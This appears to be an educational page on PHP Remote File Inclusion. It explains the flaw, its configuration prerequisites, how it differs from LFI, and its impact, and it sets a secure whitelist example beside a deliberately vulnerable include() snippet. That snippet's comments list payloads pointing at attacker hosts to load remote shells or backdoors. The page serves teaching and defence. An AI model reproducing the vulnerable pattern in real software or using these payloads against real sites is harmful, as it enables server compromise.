π Learn & Master RFI
Comprehensive guide covering theory, bypass techniques, real-world examples, and prevention strategies
What is Remote File Inclusion (RFI)?
Remote File Inclusion (RFI) is a critical web security vulnerability that allows attackers to include malicious files from remote servers into an application. By exploiting file inclusion mechanisms that rely on user input, attackers can upload web shells, create backdoors, and gain complete system control. RFI typically stems from insecure use of functions like include(), require(), and fopen() in PHP applications.
How RFI Works
RFI occurs when an application dynamically includes files based on user input and allows remote URLs. Attackers host malicious PHP code on their servers and manipulate the vulnerable parameter to include their remote file. The vulnerable application then downloads and executes the attacker's code with full privileges.
β Vulnerable Code
// Vulnerable PHP code
<?php
$page = $_GET['page'];
include($page . '.php');
?>
// Attacker payload:
// ?page=http://attacker.com/shell.txt
// ?page=https://evil.com/backdoor
// ?page=ftp://malicious.site/exploitβ Secure Code
// Secure PHP code
<?php
$allowed = ['home', 'about', 'contact'];
$page = $_GET['page'] ?? 'home';
// Whitelist validation
if (in_array($page, $allowed)) {
include("/var/www/pages/{$page}.php");
} else {
include("/var/www/pages/error.php");
}
?>RFI vs LFI: Key Differences
π Remote File Inclusion
- β’ Includes files from remote servers
- β’ Requires allow_url_include=On
- β’ Direct path to RCE
- β’ Attacker controls the file content
- β’ More severe but less common
π Local File Inclusion
- β’ Includes local files only
- β’ No special PHP settings required
- β’ Indirect path to RCE (log poisoning)
- β’ Limited to existing server files
- β’ More common but less severe
Why RFI is Primarily a PHP Vulnerability
RFI is almost exclusively a PHP vulnerability because PHP has a unique capability to include and execute remote files through functions like include(), require(), include_once(), and require_once(). When the allow_url_include PHP configuration directive is enabled, these functions can accept remote URLs (HTTP, HTTPS, FTP) and execute the code they contain.
βοΈ PHP Configuration
- β’
allow_url_include=Onenables RFI - β’
allow_url_fopen=Onrequired for HTTP/FTP - β’ Default: Off (since PHP 5.2.0)
- β’ Legacy systems may still have it enabled
π§ Other Languages
- β’ Node.js:
require()doesn't accept remote URLs - β’ Python:
importis local-only by default - β’ Java/JSP: Very rare, typically prevented
- β’ Ruby:
requiredoesn't support URLs
β οΈ Note: While other languages have similar remote code execution vulnerabilities (such as SSRF or deserialization attacks), the classic 'RFI' vulnerability that allows direct remote file inclusion is specific to PHP.
Business Impact of RFI
Complete server compromise through arbitrary code execution
Access to sensitive files, databases, and configuration data
Modify website content and reputation damage
Server becomes part of DDoS or spam botnet
Persistent access through web shells and backdoors
Pivot to internal network and compromise other systems
PHP Configuration
RFI requires specific PHP configuration settings to be exploitable. Understanding these settings helps both attackers and defenders.
allow_url_include = OnREQUIREDAllows inclusion of remote files via HTTP/FTP protocols. Disabled by default since PHP 5.2.0
allow_url_fopen = OnCOMMONEnables URL-aware fopen wrappers. Enabled by default but not sufficient alone for RFI